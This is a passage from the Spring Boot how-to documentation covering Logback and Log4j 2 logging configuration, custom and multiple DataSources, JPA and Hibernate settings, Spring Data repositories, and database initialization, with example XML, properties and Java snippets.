`org\/springframework\/boot\/logging\/logback\/`:\n\n* `defaults.xml` - Provides conversion rules, pattern properties and common logger configurations.\n* `console-appender.xml` - Adds a `ConsoleAppender` using the `CONSOLE_LOG_PATTERN`.\n* `file-appender.xml` - Adds a `RollingFileAppender` using the `FILE_LOG_PATTERN` and `ROLLING_FILE_NAME_PATTERN` with appropriate settings.\n\nIn addition, a legacy `base.xml` file is provided for compatibility with earlier versions of Spring Boot.\n\nA typical custom `logback.xml` file would look something like 
this:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/console-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"CONSOLE\" \/>\n\t\t<\/root>\n\t\t<logger name=\"org.springframework.web\" level=\"DEBUG\"\/>\n\t<\/configuration>\n----\n\nYour logback configuration file can also make use of System properties that the `LoggingSystem` takes care of creating for you:\n\n* `$\\{PID}`: The current process ID.\n* `$\\{LOG_FILE}`: Whether `logging.file.name` was set in Boot's external configuration.\n* `$\\{LOG_PATH}`: Whether `logging.file.path` (representing a directory for log files to live in) was set in Boot's external configuration.\n* `$\\{LOG_EXCEPTION_CONVERSION_WORD}`: Whether `logging.exception-conversion-word` was set in Boot's external configuration.\n* `$\\{ROLLING_FILE_NAME_PATTERN}`: Whether `logging.pattern.rolling-file-name` was set in Boot's external configuration.\n\nSpring Boot also provides some nice ANSI color terminal output on a console (but not in a log file) by using a custom Logback converter.\nSee the `CONSOLE_LOG_PATTERN` in the `defaults.xml` configuration for an example.\n\nIf Groovy is on the classpath, you should be able to configure Logback with `logback.groovy` as well.\nIf present, this setting is given preference.\n\nNOTE: Spring extensions are not supported with Groovy configuration.\nAny `logback-spring.groovy` files will not be detected.\n\n\n\n[[howto-configure-logback-for-logging-fileonly]]\n==== Configure Logback for File-only Output\nIf you want to disable console logging and write output only to a file, you need a custom `logback-spring.xml` that imports `file-appender.xml` but not `console-appender.xml`, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<configuration>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/defaults.xml\" \/>\n\t\t<property name=\"LOG_FILE\" value=\"${LOG_FILE:-${LOG_PATH:-${LOG_TEMP:-${java.io.tmpdir:-\/tmp}}\/}spring.log}\"\/>\n\t\t<include resource=\"org\/springframework\/boot\/logging\/logback\/file-appender.xml\" \/>\n\t\t<root level=\"INFO\">\n\t\t\t<appender-ref ref=\"FILE\" \/>\n\t\t<\/root>\n\t<\/configuration>\n----\n\nYou also need to add `logging.file.name` to your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tlogging.file.name=myapplication.log\n----\n\n\n\n[[howto-configure-log4j-for-logging]]\n=== Configure Log4j for Logging\nSpring Boot supports https:\/\/logging.apache.org\/log4j\/2.x\/[Log4j 2] for logging configuration if it is on the classpath.\nIf you use the starters for assembling dependencies, you have to exclude Logback and then include log4j 2 instead.\nIf you do not use the starters, you need to provide (at least) `spring-jcl` in addition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some jiggling with excludes.\nThe following example shows how to set up the starters in 
Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation 'org.springframework.boot:spring-boot-starter-web'\n\t\timplementation 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging requirements (such as having Tomcat use `java.util.logging` but configuring the output using Log4j 2).\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into Log4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK logging adapter] by setting the `java.util.logging.manager` system property to `org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON configuration files.\nTo configure Log4j 2 to use an alternative configuration file format, add the appropriate dependencies to the classpath and name your configuration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75a,15a\"]\n|===\n| Format | Dependencies | File names\n\n|YAML\n| `com.fasterxml.jackson.core:jackson-databind` + `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\n| `log4j2.yaml` + `log4j2.yml`\n\n|JSON\n| `com.fasterxml.jackson.core:jackson-databind`\n| `log4j2.json` + `log4j2.jsn`\n|===\n\n\n\n[[howto-data-access]]\n== Data Access\nSpring Boot includes a number of starters for working with data sources.\nThis section answers questions related to doing so.\n\n\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database initialization.\nIf you need to externalize some settings, you can bind your `DataSource` to the environment (see \"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your 
`FancyDataSource` has regular JavaBean properties for the URL, the username, and the pool size, these settings are bound automatically before the `DataSource` is made available to other components.\nThe regular <<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens (so the relevant sub-set of `spring.datasource.*` can still be used with your custom configuration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can be used to create one of the standard data sources (if it is on the classpath).\nThe builder can detect the one to use based on what's available on the classpath.\nIt also auto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection information.\nPool-specific settings can also be provided.\nCheck the implementation that is going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch.\nBecause the actual type of the connection pool is not exposed, no keys are generated in the metadata for your custom `DataSource` and no completion is available in your IDE (because the `DataSource` interface exposes no properties).\nAlso, if you happen to have Hikari on the classpath, this basic setup does not work, because Hikari has no `url` property (but does have a `jdbcUrl` property).\nIn that case, you must rewrite your configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated implementation rather than `DataSource`.\nYou cannot change the implementation at runtime, but the list of options will be explicit.\n\nThe following example shows how to create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is, by providing a default embedded database with a sensible username and password if no URL is provided.\nYou can easily initialize a `DataSourceBuilder` from the state of any `DataSourceProperties` object, so you could also inject the `DataSource` that Spring Boot creates automatically.\nHowever, that would split your configuration into two namespaces: `url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on your custom namespace (`app.datasource`).\nTo avoid that, you can redefine a custom `DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except 
that a dedicated connection pool is chosen (in code) and its settings are exposed in the `app.datasource.configuration` sub namespace.\nBecause `DataSourceProperties` is taking care of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`.\nThis example uses a more generic `configuration` sub namespace because the example does not support multiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type` has no effect.\nIn practice, the builder is initialized with whatever value you might set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the \"`Spring Boot features`\" section and the {spring-boot-autoconfigure-module-code}\/jdbc\/DataSourceAutoConfiguration.java[`DataSourceAutoConfiguration`] class for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are described in the previous section.\nYou must, however, mark one of the `DataSource` instances as `@Primary`, because various auto-configurations down the road expect to be able to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off.\nIn the following example, we provide the _exact_ same feature set as the auto-configuration provides on the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database initializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations.\nFor instance, you could configure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same logic as Spring Boot would use in auto-configuration.\nNote that each `configuration` sub namespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in the same package as (or a sub-package of) your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on your classpath.\nThere is a `spring-boot-starter-data-jpa` for JPA, a `spring-boot-starter-data-mongodb` for MongoDB, and so on.\nTo get started, create some repository interfaces to handle your `@Entity` objects.
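\n\nThe following is a minimal sketch of such an interface, assuming a hypothetical `City` entity with a `Long` primary key; the entity and the derived query method are illustrative only:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tpublic interface CityRepository extends JpaRepository<City, Long> {\n\n\t\t\/\/ Spring Data derives the query from the method name,\n\t\t\/\/ assuming the City entity has a \"name\" property\n\t\tList<City> findByName(String name);\n\n\t}\n----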
\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, use the `@EnableJpaRepositories` annotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the `@EnableAutoConfiguration` it finds.\nTo get more control, you can use the `@EntityScan` annotation, as shown in the following example:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as those for SQL logging), and Spring Boot exposes those options and a few more for Hibernate as external configuration properties.\nSome of them are automatically detected according to the context, so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` property is a special case, because, depending on runtime conditions, it has different defaults.\nIf an embedded database is used and no schema manager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to `create-drop`.\nIn all other cases, it defaults to `none`.\n\nThe dialect to use is detected by the JPA provider.\nIf you prefer to set the dialect yourself, set the configprop:spring.jpa.database-platform[] property.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs="verbatim,quotes,attributes"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n[WARNING]\n====\nYou need to ensure that names defined under `+spring.jpa.properties.*+` exactly match those expected by your JPA provider.\nSpring Boot will not attempt any kind of relaxed binding for these entries.\n\nFor example, if you want to configure Hibernate's batch size, you must use `+spring.jpa.properties.hibernate.jdbc.batch_size+`.\nIf you use other forms, such as `batchSize` or `batch-size`, Hibernate will not apply the setting.\n====\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating the `EntityManagerFactory`.\nThis takes precedence over anything that is applied by the auto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-docs}#naming[two different naming strategies] to map names from the object model to the corresponding database names.\nThe fully qualified class name of the physical and the implicit strategy implementations can be configured by setting the `spring.jpa.hibernate.naming.physical-strategy` and 
`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively.\nAlternatively, if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the application context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with `SpringPhysicalNamingStrategy`.\nThis implementation provides the same table structure as Hibernate 4: all dots are replaced by underscores and camel casing is replaced by underscores as well.\nBy default, all table names are generated in lower case, but it is possible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/HibernateJpaAutoConfiguration.java[`HibernateJpaAutoConfiguration`] and {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-docs}#caching[second-level cache] can be configured for a range of cache providers.\nRather than configuring Hibernate to lookup the cache provider again, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy.\nFirst, make sure that `org.hibernate:hibernate-jcache` is available on the classpath.\nThen, add a `HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that the application uses.\nIt is also possible to use separate `CacheManager` instances.\nFor details, refer to {hibernate-docs}#caching-provider-jcache[the Hibernate user guide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the `BeanFactory` so that converters and entity listeners can use regular dependency injection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer` that removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add a `@Bean` named '`entityManagerFactory`'.\nSpring Boot auto-configuration switches off its entity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the default.\nTo make it easy to do, you can use the convenient 
`EntityManagerFactoryBuilder` provided by Spring Boot.\nAlternatively, you can use the `LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the following example:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nNOTE: When you create a bean for `LocalContainerEntityManagerFactoryBean` yourself, any customization that was applied during the creation of the auto-configured `LocalContainerEntityManagerFactoryBean` is lost.\nFor example, in the case of Hibernate, any properties under the `spring.jpa.hibernate` prefix will not be automatically applied to your `LocalContainerEntityManagerFactoryBean`.\nIf you were relying on these properties for configuring things like the naming strategy or the DDL mode, you will need to explicitly configure that when creating the `LocalContainerEntityManagerFactoryBean` bean.\nOn the other hand, properties that get applied to the auto-configured `EntityManagerFactoryBuilder`, which are specified via `spring.jpa.properties`, will automatically be applied, provided you use the auto-configured `EntityManagerFactoryBuilder` to build the `LocalContainerEntityManagerFactoryBean` bean.\n\nThe configuration above almost works on its own.\nTo complete the picture, you need to configure `TransactionManagers` for the two `EntityManagers` as well.\nIf you mark one of them as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring Boot.\nThe other would have to be explicitly injected into a new instance.\nAlternatively, you might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly, as shown in the following example:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional persistence.xml File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default.\nIf you prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the persistence unit name there.\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\nSpring Data JPA and Spring Data Mongo can 
both automatically create `Repository` implementations for you.\nIf they are both present on the classpath, you might have to do some extra configuration to tell Spring Boot which repositories to create.\nThe most explicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and `+@EnableMongoRepositories+` annotations and provide the location of your `Repository` interfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and `+spring.data.*.repositories.type+`) that you can use to switch the auto-configured repositories on and off in external configuration.\nDoing so is useful, for instance, if you want to switch off the Mongo repositories and still use the auto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data repository types (Elasticsearch, Solr, and others).\nTo work with them, change the names of the annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a web application.\nSpring Boot provides properties in the `spring.data.web` namespace for customizing its configuration.\nNote that if you are using Spring Data REST, you must use the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace) that customize the {spring-data-rest-api}\/core\/config\/RepositoryRestConfiguration.html[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a {spring-data-rest-api}\/webmvc\/config\/RepositoryRestConfigurer.html[`RepositoryRestConfigurer`] bean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs after the one Spring Boot uses internally.\nIf you need to specify an order, make sure it is higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure that the component is initialized before JPA.\nWhen the component is auto-configured, Spring Boot takes care of this for you.\nFor example, when Flyway is auto-configured, Hibernate is configured to depend upon Flyway so that Flyway has a chance to initialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an `EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up the necessary dependencies.\nFor example, if you use Hibernate Search with Elasticsearch as its index manager, any `EntityManagerFactory` beans must be configured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own `DSLContext` for each one.
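\n\nThe following is a minimal sketch, assuming two `DataSource` beans named `firstDataSource` and `secondDataSource` (as in "`Configure Two DataSources`" above) and an illustrative SQL dialect:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Bean\n\tpublic DSLContext firstDslContext(@Qualifier(\"firstDataSource\") DataSource firstDataSource) {\n\t\t\/\/ Wrapping the DataSource keeps jOOQ inside Spring-managed transactions\n\t\treturn DSL.using(new TransactionAwareDataSourceProxy(firstDataSource), SQLDialect.MYSQL);\n\t}\n\n\t@Bean\n\tpublic DSLContext secondDslContext(@Qualifier(\"secondDataSource\") DataSource secondDataSource) {\n\t\treturn DSL.using(new TransactionAwareDataSourceProxy(secondDataSource), SQLDialect.MYSQL);\n\t}\n----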
\n\nRefer to {spring-boot-autoconfigure-module-code}\/jooq\/JooqAutoConfiguration.java[JooqAutoConfiguration] for more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be reused to provide similar features to what the auto-configuration does with a single `DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the database.\nThis is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the behavior in a more fine-grained way.\n This feature is described in more detail later in this guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly, and the standard Hibernate property values are `none`, `validate`, `update`, `create`, and `create-drop`.\nSpring Boot chooses a default value for you based on whether it thinks your database is embedded.\nIt defaults to `create-drop` if no schema manager has been detected and to `none` in all other cases.\nAn embedded database is detected by looking at the `Connection` type.\n`hsqldb`, `h2`, and `derby` are embedded, and others are not.\nBe careful when switching from in-memory to a '`real`' database that you do not make assumptions about the existence of the tables and data in the new platform.\nYou either have to set `ddl-auto` explicitly or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger.\nThis is done for you automatically if you enable the <<spring-boot-features.adoc#boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on startup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property is set to `create` or `create-drop`).\nThis can be useful for demos and for testing if you are careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database using basic SQL scripts\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and initialize it (DML scripts).\nIt loads SQL from the standard root classpath locations: `schema.sql` and `data.sql`, respectively.\nIn addition, Spring Boot processes the `schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform` is the value of `spring.datasource.platform`.\nThis allows you to switch to database-specific scripts if necessary.\nFor example, you might choose to set it to the vendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nWhen only basic SQL scripts are used, Spring Boot automatically creates the schema of an embedded `DataSource`.\nThis behavior can be customized by using the 
configprop:spring.datasource.initialization-mode[] property.\nFor instance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n\nIn a JPA-based app, you can choose to let Hibernate create the schema or use `schema.sql`, but you cannot do both.\nMake sure to disable `spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.ddl-auto=none\n----\n\nIf you are using a <<spring-boot-features.adoc#howto-use-a-higher-level-database-migration-tool,Higher-level Database Migration Tool>>, like Flyway or Liquibase, you cannot use basic SQL scripts to create and initialize the schema.\nIn this situation, if `schema.sql` and `data.sql` are present, they will be ignored.\nIt is not possible to use a Database Migration Tool to manage schema creation, and a basic SQL script to initialize it.\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer.\nThis means that, if the scripts cause exceptions, the application fails to start.\nYou can tune that behavior by setting `spring.datasource.continue-on-error`.\n\n\n\n[[howto-initialize-a-database-using-r2dbc]]\n=== Initialize a Database Using R2DBC\nIf you are using R2DBC, the regular `DataSource` auto-configuration backs off so none of the options described above can be used.\n\nIf you are using Spring Data R2DBC, you can initialize the database on startup using simple SQL scripts as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/r2dbc\/R2dbcDatabaseInitializationExample.java[tag=configuration]\n----\n\nAlternatively, you can configure either <<howto-execute-flyway-database-migrations-on-startup,Flyway>> or <<howto-execute-liquibase-database-migrations-on-startup,Liquibase>> to configure a `DataSource` for you for the duration of the migration.\nBoth these libraries offer properties to set the `url`, `username` and `password` of the database to migrate.\n\nNOTE: When choosing this option, `org.springframework:spring-jdbc` is still a required dependency.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most popular database platforms.\nSpring Boot can detect your database type and execute those scripts on startup.\nIf you use an embedded database, this happens by default.\nYou can also enable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting `spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two 